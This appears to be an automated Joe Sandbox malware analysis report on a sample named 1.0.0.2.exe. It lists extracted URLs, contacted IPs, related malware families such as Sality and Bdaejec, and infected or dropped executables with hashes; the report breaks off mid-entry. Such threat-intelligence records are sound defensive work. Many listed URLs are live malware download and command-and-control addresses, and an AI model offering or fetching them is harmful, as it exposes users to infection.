          http://apple-pie.in/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          		unknown
          http://arthur.niria.biz/xs.jpg?51fbda=48356010a1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://amsamex.com/xs.jpg?ce2fff=9458892161.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.develop.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://althawry.org/images/xs.jpg?4f8fad=2607062541.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.youku.com/playlist_show/id_25824322.html1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.spaceblue.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.baanboard.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.develop.comDeepakSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://127.0.0.1/R2_2021/ServerInfo.json1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310T1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://kukutrustnet987.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar9rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.rftp.comJosiahSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar6rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.activestate.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar4rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://173.193.19.14/logo.gif1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DErksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://kukutrustnet888.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://althawry.org/images/xs.jpg?a6d450=655999681.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://upx.sf.netAmcache.hve.2.drfalse
          • URL Reputation: safe
          		unknown
          http://www.rftp.comSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310C1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarLrksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://kukutrustnet777.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://amsamex.com/xs.jpg?549590=277165601.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;01.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.lua.orgSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ddos.dnsnb8.net/rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarprksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?1.1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://kukutrustnet777888.info/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          		unknown
          http://pan.baidu.com/s/1qWKD5ve1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://89.119.67.154/testo5/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh71.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK21.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          44.221.84.105
          		ddos.dnsnb8.netUnited States
          		14618AMAZON-AESUStrue
          78.46.2.155
          		ahmediye.netGermany
          		24940HETZNER-ASDEtrue
          54.244.188.177
          		www.careerdesk.orgUnited States
          		16509AMAZON-02UStrue
          37.230.104.89
          		ampyazilim.com.trTurkey
          		42807AEROTEK-ASTRtrue
          85.17.167.196
          		unknownNetherlands
          		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1467981
          Start date and time:2024-07-05 07:59:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 30s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:3
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:1.0.0.2.exe
          Detection:MAL
          Classification:mal100.spre.troj.evad.winEXE@5/15@10/5
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 69%
          • Number of executed functions: 57
          • Number of non-executed functions: 15
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 40.126.31.69, 40.126.31.67, 40.126.31.71, 20.190.159.71, 20.190.159.64, 20.190.159.73, 20.190.159.2, 20.190.159.68
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          02:00:00API Interceptor181x Sleep call for process: 1.0.0.2.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          44.221.84.105FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
          • suddencover.net/index.php
          FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
          • suddencover.net/index.php
          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
          • englishproud.net/index.php
          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
          • englishproud.net/index.php
          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
          • englishproud.net/index.php
          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
          • englishproud.net/index.php
          log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
          • ddos.dnsnb8.net:799/cj//k2.rar
          log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
          • ddos.dnsnb8.net:799/cj//k2.rar
          2.exeGet hashmaliciousBdaejecBrowse
          • ddos.dnsnb8.net:799/cj//k2.rar
          qUIeH5lkl3.exeGet hashmaliciousMetaMorpher RATBrowse
          • bejnz.com/IP.php
          78.46.2.155pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • ahmediye.net/xs.jpg?6273be3=929110779
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • ahmediye.net/xs.jpg?228483d4=579109844
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • ahmediye.net/xs.jpg?14ffade3=-1828863691
          54.244.188.177FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
          • cigaretteshoulder.net/index.php
          FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
          • cigaretteshoulder.net/index.php
          ILTgEaPqmE.exeGet hashmaliciousUnknownBrowse
          • cigarettewritten.net/index.php
          ILTgEaPqmE.exeGet hashmaliciousUnknownBrowse
          • cigarettewritten.net/index.php
          Jla3M8Fe16.exeGet hashmaliciousUnknownBrowse
          • cigarettewritten.net/index.php
          Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
          • stillneedle.net/index.php
          gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
          • stillneedle.net/index.php
          Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
          • stillneedle.net/index.php
          gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
          • stillneedle.net/index.php
          80b.exeGet hashmaliciousUnknownBrowse
          • pywolwnvd.biz/soptlhodr

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ampyazilim.com.trpXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 37.230.104.89
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • 37.230.104.89
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • 37.230.104.89
          apple-pie.inpXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • 63.251.106.25
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          ahmediye.netpXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 78.46.2.155
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • 78.46.2.155
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • 78.46.2.155
          www.careerdesk.orgpXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 206.191.152.58
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • 206.191.152.58
          HP8odfgSjP.exeGet hashmaliciousSalityBrowse
          • 206.191.152.58
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • 206.191.152.58
          #U622a#U56fe.exeGet hashmaliciousSalityBrowse
          • 206.191.152.58
          arthur.niria.bizpXlV6TKi3E.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          Server.exeGet hashmaliciousMimikatz, SalityBrowse
          • 63.251.106.25
          HP8odfgSjP.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          9zalmn1701.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          #U622a#U56fe.exeGet hashmaliciousSalityBrowse
          • 63.251.106.25
          ddos.dnsnb8.netlog1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
          • 44.221.84.105
          log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
          • 44.221.84.105
          2.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
          • 44.221.84.105
          xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          hJSrJRHret.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          KFt0cactum.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          gvQbT2QOfb.exeGet hashmaliciousBdaejecBrowse
          • 44.221.84.105
          HN3iYIEz7m.exeGet hashmaliciousUnknownBrowse
          • 34.174.61.199

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          LEASEWEB-NL-AMS-01NetherlandsNLhttp://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
          • 178.162.175.77
          https://reservation.exnetehovervs.com/apart/285z92aaza77zGet hashmaliciousUnknownBrowse
          • 185.17.186.162
          http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
          • 178.162.175.77
          http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
          • 89.149.193.105
          http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
          • 185.17.186.161
          8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
          • 79.170.242.64
          SOA 020724.exeGet hashmaliciousFormBookBrowse
          • 212.32.237.91
          https://supp-review9482.eu/Get hashmaliciousUnknownBrowse
          • 185.17.186.162
          http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
          • 89.149.193.104
          Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
          • 212.32.237.101
          AMAZON-AESUSFFbd.dllGet hashmaliciousUnknownBrowse
          • 50.16.47.176
          https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
          • 18.211.218.206
          https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
          • 34.203.90.74
          https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
          • 34.201.239.212
          http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
          • 52.72.219.252
          https://swans-muffin-1id4964-7304421.netlify.app/formGet hashmaliciousUnknownBrowse
          • 54.205.31.52
          http://diffusion-florentine-facilitated.netlify.app/form.htmlGet hashmaliciousUnknownBrowse
          • 18.213.222.111
          https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
          • 54.147.25.172
          Scan405.exeGet hashmaliciousFormBookBrowse
          • 18.207.45.52
          ScanPDF_102.exeGet hashmaliciousFormBookBrowse
          • 34.195.23.156
          AEROTEK-ASTRhesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
          • 94.199.200.98
          739077083533. FedEX_13100976 _20.05.2024 %100%_jpg.exeGet hashmaliciousAgentTeslaBrowse
          • 94.199.206.42
          024 - PT MARGATEK_ SETYATAMA PO 13100976 _20.05.2024 %100%_jpg .exeGet hashmaliciousAgentTeslaBrowse
          • 94.199.206.42
          oae7jKW2lr.exeGet hashmaliciousAgentTeslaBrowse
          • 109.232.216.54
          #U0130#U015eLEM #U00d6ZET#U0130_20524057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
          • 94.199.206.42
          F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 109.232.216.54
          F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exeGet hashmaliciousAgentTeslaBrowse
          • 109.232.216.54
          F#U0130YAT TALEB#U0130.exeGet hashmaliciousAgentTeslaBrowse
          • 109.232.216.54
          Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 94.199.206.42
          F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 109.232.216.54
          AMAZON-02USpoMkNYHDU3.exeGet hashmaliciousRemcosBrowse
          • 104.192.141.1
          NtjLYDrHzE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
          • 15.229.32.8
          PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
          • 13.248.169.48
          https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
          • 18.239.50.108
          https://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
          • 52.222.232.144
          https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
          • 143.204.176.115
          https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
          • 13.227.219.3
          http://review-page-violation-issue-meta-center.vercel.app/Get hashmaliciousUnknownBrowse
          • 76.76.21.98
          http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
          • 13.227.219.3
          http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
          • 76.76.21.98
          HETZNER-ASDEhttps://gmoq4wwvl9phy.pages.dev/smart89/Get hashmaliciousUnknownBrowse
          • 195.201.57.90
          lem.exeGet hashmaliciousVidarBrowse
          • 5.75.221.27
          0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 176.9.105.210
          file.exeGet hashmaliciousVidarBrowse
          • 49.13.159.121
          Scan405.exeGet hashmaliciousFormBookBrowse
          • 116.202.213.59
          ScanPDF_102.exeGet hashmaliciousFormBookBrowse
          • 116.202.213.59
          https://vi-822.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
          • 5.161.38.67
          https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
          • 5.161.38.67
          https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
          • 5.161.38.67
          QeIcyVt0Op.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
          • 5.75.221.27

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\rksowY.exelog1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
            log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
              2.exeGet hashmaliciousBdaejecBrowse
                gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
                  xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
                    LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
                      hJSrJRHret.exeGet hashmaliciousBdaejecBrowse
                        KFt0cactum.exeGet hashmaliciousBdaejecBrowse
                          gvQbT2QOfb.exeGet hashmaliciousBdaejecBrowse
                            HN3iYIEz7m.exeGet hashmaliciousUnknownBrowse

                              Created / dropped Files

                              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):19456
                              Entropy (8bit):6.590971855603511
                              Encrypted:false
                              SSDEEP:384:1FoShXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:5/QGPL4vzZq2o9W7GsxBbPr
                              MD5:938AB2A2B5014611C3EBCFA145576C11
                              SHA1:477CBD607878830739B8324D316675F96F2058EE
                              SHA-256:A72035D201F27AFFFDD94A53F9DFA5DAB7277F68A3899F9E01376D98DE3339CF
                              SHA-512:342EAEF8F86C193986E1878FD013668D5F2A4AF10B10A76330C20ACAC8E2250A724D59E5A8C3F0DAF10DD8DFDD5E3A1DE68820E971BFC71415F48230014181D7
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):2389504
                              Entropy (8bit):6.731345632215611
                              Encrypted:false
                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                              MD5:D31456E4E63070C4F5B1B590E26473B3
                              SHA1:9AA4CB8BC265DF73A8F8F715076D15E2A6E24640
                              SHA-256:FD4DC424A62FD3AAD956F4EF31556F95E2CB8B63D9B4D4CA7BE171583D672CE8
                              SHA-512:5B7BBA511C63E5CB53FC50E5D7652C38D769823C23B9E6A6F65208455E0D86EFD9F619753F8C3E442B8BAF231A932C319080BC1F316D6A9CDCFC2DC7D61AD044
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                              C:\Program Files\7-Zip\Uninstall.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):31744
                              Entropy (8bit):6.36644778242075
                              Encrypted:false
